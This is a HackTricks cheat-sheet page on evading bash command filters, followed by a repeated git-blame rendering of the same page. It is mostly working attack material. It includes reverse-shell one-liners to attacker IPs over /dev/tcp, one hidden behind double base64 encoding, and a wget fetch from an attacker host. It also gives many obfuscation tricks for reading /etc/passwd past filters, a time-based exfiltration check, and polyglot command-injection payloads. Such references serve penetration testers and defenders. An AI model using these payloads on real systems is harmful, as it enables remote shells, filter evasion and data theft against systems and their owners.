hacktricks/linux-unix/useful-linux-commands/bypass-bash-restrictions.md

# Bypass Bash Restrictions

## Reverse Shell

```bash
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
#echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
```

### Short Rev shell

```bash
#Trick from Dikline
#Get a rev shell with
(sh)0>/dev/tcp/10.10.10.10/443
#Then get the out of the rev shell executing inside of it:
exec >&0
```

## Bypass Paths and forbidden words

```bash
# Question mark binary substitution
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost

# Wildcard(*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami

# Wildcard + local directory arguments
touch -- -la # -- stops processing options after the --
ls *

# [chars]
/usr/bin/n[c] # /usr/bin/nc

# Quotes / Concatenation
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
\u\n\a\m\e \-\a # uname -a
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64
/\b\i\n/////s\h

# Execution through $0
echo whoami|$0

# Uninitialized variables: A uninitialized variable equals to null (nothing)
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters

# Fake commands
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown

# Concatenation of strings using history
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
mi # This will throw an error
whoa # This will throw an error
!-1!-2 # This will execute whoami
```

## Bypass forbidden spaces

```bash
# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test

## IFS - Internal field separator, change " " for any other character ("]" in this case)
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd

# Put the command line in a variable and then execute it
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
#  Other way, just change each space for ${IFS}
echo${IFS}test

# Using hex format
X=$'cat\x20/etc/passwd'&&$X

# New lines
p\
i\
n\
g # These 4 lines will equal to ping

## Undefined variables and !
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
uname!-1\-a # This equals to uname -a
```

## Bypass backslash and slash

```bash
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
```

## Bypass with hex encoding

```bash
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps <(echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
```

## Bypass IPs

```bash
# Decimal IPs
127.0.0.1 == 2130706433
```

## Time based data exfiltration

```bash
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
```

## DNS data exfiltration

You could use **burpcollab** or [**pingb**](http://pingb.in) **** for example.

## Polyglot command injection

```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
```

## References & More

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits" %}

{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" %}

{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %}

{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %}
GitBook: [master] 3 pages and 2 assets modified 2021-02-17 13:02:24 +01:00			`# Bypass Bash Restrictions`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00
Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`## Reverse Shell`
GitBook: [master] 3 pages and 2 assets modified 2021-02-17 13:02:24 +01:00
			```bash
Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time`
Update bypass-bash-restrictions.md 2021-02-17 00:15:57 +01:00			`echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' \| base64 \| base64)\|ba''se''6''4 -''d\|ba''se''64 -''d\|b''a''s''h" \| sed 's/ /${IFS}/g'`
			`#echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K\|ba''se''6''4${IFS}-''d\|ba''se''64${IFS}-''d\|b''a''s''h`
Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			```
GitBook: [master] 3 pages and 2 assets modified 2021-02-17 13:02:24 +01:00
GitBook: [master] 2 pages modified 2021-03-30 02:10:09 +02:00			`### Short Rev shell`

			```bash
GitBook: [master] 2 pages modified 2021-03-30 10:00:11 +02:00			`#Trick from Dikline`
GitBook: [master] 2 pages modified 2021-03-30 02:10:09 +02:00			`#Get a rev shell with`
			`(sh)0>/dev/tcp/10.10.10.10/443`
			`#Then get the out of the rev shell executing inside of it:`
			`exec >&0`
			```

GitBook: [master] one page modified 2021-04-12 11:10:24 +02:00			`## Bypass Paths and forbidden words`
GitBook: [master] 3 pages and 2 assets modified 2021-02-17 13:02:24 +01:00
			```bash
Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`# Question mark binary substitution`
			`/usr/bin/p?ng # /usr/bin/ping`
			`nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost`

			`# Wildcard(*) binary substitution`
			`/usr/bin/who*mi # /usr/bin/whoami`

			`# Wildcard + local directory arguments`
			`touch -- -la # -- stops processing options after the --`
			`ls *`

			`# [chars]`
			`/usr/bin/n[c] # /usr/bin/nc`

			`# Quotes / Concatenation`
			`'p'i'n'g # ping`
			`"w"h"o"a"m"i # whoami`
			`\u\n\a\m\e \-\a # uname -a`
			`ech''o test # echo test`
			`ech""o test # echo test`
			`bas''e64 # base64`
GitBook: [master] one page modified 2021-04-12 11:10:24 +02:00			`/\b\i\n/////s\h`

GitBook: [master] one page modified 2021-04-20 09:42:08 +02:00			`# Execution through $0`
GitBook: [master] one page modified 2021-04-12 11:10:24 +02:00			`echo whoami\|$0`
Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00
			`# Uninitialized variables: A uninitialized variable equals to null (nothing)`
			`cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol`
			`p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters`

			`# Fake commands`
			`p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown`
			w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown

			`# Concatenation of strings using history`
			`!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command`
			`mi # This will throw an error`
			`whoa # This will throw an error`
			`!-1!-2 # This will execute whoami`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			```

			`## Bypass forbidden spaces`
GitBook: [master] 3 pages and 2 assets modified 2021-02-17 13:02:24 +01:00
			```bash
Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`# {form}`
			`{cat,lol.txt} # cat lol.txt`
			`{echo,test} # echo test`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00
Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`## IFS - Internal field separator, change " " for any other character ("]" in this case)`
			`cat${IFS}/etc/passwd # cat /etc/passwd`
			`cat$IFS/etc/passwd # cat /etc/passwd`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00
Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`# Put the command line in a variable and then execute it`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			`IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b`
Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`IFS=];b=cat]/etc/passwd;$b # Using 2 ";"`
			IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
			`# Other way, just change each space for ${IFS}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			`echo${IFS}test`

Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`# Using hex format`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			`X=$'cat\x20/etc/passwd'&&$X`

Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`# New lines`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			`p\`
			`i\`
			`n\`
GitBook: [master] one page modified 2021-02-23 22:39:56 +01:00			`g # These 4 lines will equal to ping`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00
Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`## Undefined variables and !`
			`$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined`
			`uname!-1\-a # This equals to uname -a`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			```

GitBook: [master] one page modified 2021-04-12 11:10:24 +02:00			`## Bypass backslash and slash`

			```bash
			`cat ${HOME:0:1}etc${HOME:0:1}passwd`
			`cat $(echo . \| tr '!-0' '"-1')etc$(echo . \| tr '!-0' '"-1')passwd`
			```

			`## Bypass with hex encoding`

			```bash
			`echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
			cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
			`abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc`
			`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
			cat `xxd -r -p <<< 2f6574632f706173737764`
			`xxd -r -ps <(echo 2f6574632f706173737764)`
			cat `xxd -r -ps <(echo 2f6574632f706173737764)`
			```

GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			`## Bypass IPs`
GitBook: [master] 3 pages and 2 assets modified 2021-02-17 13:02:24 +01:00
			```bash
Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`# Decimal IPs`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			`127.0.0.1 == 2130706433`
			```

GitBook: [master] one page modified 2021-04-12 11:10:24 +02:00			`## Time based data exfiltration`

			```bash
			`time if [ $(whoami\|cut -c 1) == s ]; then sleep 5; fi`
			```

			`## DNS data exfiltration`

GitBook: [#2876] save 2021-11-30 17:46:07 +01:00			`You could use burpcollab or [pingb](http://pingb.in) **** for example.`
GitBook: [master] one page modified 2021-04-12 11:10:24 +02:00
			`## Polyglot command injection`

			```bash
			`1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}`
			/$(sleep 5)`sleep 5``/-sleep(5)-'/$(sleep 5)`sleep 5` #/-sleep(5)\|\|'"\|\|sleep(5)\|\|"/`/
			```

Update bypass-bash-restrictions.md Add additional tricks, cleanup some things, spell-check, etc. 2021-02-16 23:44:45 +01:00			`## References & More`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 13:21:18 +02:00			`{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits" %}`
GitBook: [master] 3 pages and 2 assets modified 2021-02-17 13:02:24 +01:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 13:21:18 +02:00			`{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" %}`
GitBook: [master] 3 pages and 2 assets modified 2021-02-17 13:02:24 +01:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 13:21:18 +02:00			`{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 13:21:18 +02:00			`{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %}`